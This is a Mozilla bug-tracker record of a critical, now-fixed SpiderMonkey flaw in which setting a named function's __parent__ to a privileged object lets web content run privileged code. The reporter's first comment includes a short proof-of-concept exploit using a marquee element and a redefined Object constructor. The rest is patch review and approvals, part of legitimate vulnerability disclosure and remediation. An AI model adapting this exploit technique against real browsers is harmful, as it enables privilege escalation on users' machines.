Closed Bug 340727 Opened 18 years ago Closed 18 years ago

Arbitrary code execution by setting fun.__parent__ to a privileged object

Categories

(Core :: Security, defect, P2)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla1.9alpha1

People

(Reporter: moz_bug_r_a4, Assigned: mrbkap)

Details

(Keywords: fixed1.8.1, verified1.8.0.5, Whiteboard: [sg:critical])

Attachments

(3 files)

testcase
398 bytes, text/html
Details
Fix
1.29 KB, patch
igor
: review+
shaver
: superreview+
jay
: approval1.8.0.5+
Details | Diff | Splinter Review
for 1.0.x
849 bytes, patch
Details | Diff | Splinter Review 
A named function created by function expression has a extra parent object that
has a property whose name is the function name.

  a = function b() {};
  a.__parent__.toSource();

  -> ({b:(function b() {})})

There is a way to set the parent object in question to a privileged object.
(I got the hint from Bug 338709.)

  Object = function() { return privileged_object; };
  a = function b() {};

Exploit:
  <marquee id="m">
  x = m.init.eval.prototype;
  x.w = window;
  Object = function() { return x; };
  var a = function b() { with (w) alert(Components.stack); };
  a.call({}); // to avoid the access check in js_ComputeThis.
Attached file testcase 

    
    

    
  

      
      
      
      

        Attached patch
          
          
        FixSplinter Review
      

    


  
If anybody's relying on this behavior already, then, IMO, they'll get what they deserve.
Assignee: dveditz → mrbkap
Status: NEW → ASSIGNED

        Attachment #224775 -
        Flags: superreview?(shaver)

    
  
OS: Windows XP → All
Priority: -- → P2
Hardware: PC → All
Target Milestone: --- → mozilla1.9alpha

    
  

        Attachment #224775 -
        Flags: review?(igor.bukanov)

    
    

    
  
Comment on attachment 224775 [details] [diff] [review]
Fix

sr=shaver

        Attachment #224775 -
        Flags: superreview?(shaver) → superreview+

    
    

    
  
Comment on attachment 224775 [details] [diff] [review]
Fix

This is an area where as I remember Rhino deviates from SpiderMonkey quite significantly. For named function expressions Rhino parser simply adds a variable initialized to the function itself avoiding an extra objects. It violates Ecma v3 since potentially user-visible  new Object is not called. But this is really the case of broken specs.

        Attachment #224775 -
        Flags: review?(igor.bukanov) → review+

    
    

    
  
Fix checked into trunk.
Status: ASSIGNED → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED

    
    

    
  
(In reply to comment #4)
> (From update of attachment 224775 [details] [diff] [review] [edit])
> This is an area where as I remember Rhino deviates from SpiderMonkey quite
> significantly. For named function expressions Rhino parser simply adds a
> variable initialized to the function itself avoiding an extra objects. It
> violates Ecma v3 since potentially user-visible  new Object is not called. But
> this is really the case of broken specs.

Yes, here and in catch clause case, ECMA-262 goes off the rails.  It often (but not consistently) uses an internal constructor function that magically uses the "original Object.prototype value" as the prototype of the new object, and does not invoke the constructor function by its name.

For ES4, both cases should use lexical scope.

/be
Flags: blocking1.8.1?
Flags: blocking1.8.0.5?
Flags: blocking1.7.14?
Flags: blocking-aviary1.0.9?
Whiteboard: [sg:critical]

    
  
Flags: blocking1.8.0.5? → blocking1.8.0.5+

    
    

    
  
Comment on attachment 224775 [details] [diff] [review]
Fix

a=jay for checkin on the 1.8.0 branch.

        Attachment #224775 -
        Flags: approval1.8.0.5+

    
    

    
  
Fix checked into the 1.8 branches.
Keywords: fixed1.8.0.5, 
          
            fixed1.8.1

    
    

    
  
v.fixed on 1.8.0 branch with Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.5) Gecko/20060619 Firefox/1.5.0.5
Keywords: fixed1.8.0.5verified1.8.0.5

    
    

    
  

      
      
      
      

        Attached patch
          
          
        for 1.0.xSplinter Review
      

    


  
can't remember if the original applied cleanly. This one does for sure.
Group: core-security
Flags: blocking1.8.1?
Flags: blocking-aviary1.0.9?

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: